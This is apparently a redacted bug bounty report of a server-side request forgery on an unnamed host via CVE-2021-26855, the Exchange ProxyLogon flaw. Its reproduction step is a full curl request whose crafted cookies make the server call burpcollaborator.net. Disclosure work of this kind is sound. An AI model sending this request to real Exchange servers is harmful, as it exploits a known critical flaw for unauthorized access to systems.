SSRF due to CVE-2021-26855 on ████████

**Description:** There exists a Server Side Request Frogery (SSRF) on ***█████████*** due to ***CVE-2021-26855*** ## References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855 ## Impact Server Side Request Frogery ## System Host(s) ██████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-26855 ## Steps to Reproduce ``` curl -i -s -k -X $'GET' \ -H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \ $'https://███/owa/auth/x.js' ``` Output: █████████ ## Suggested Mitigation/Remediation Actions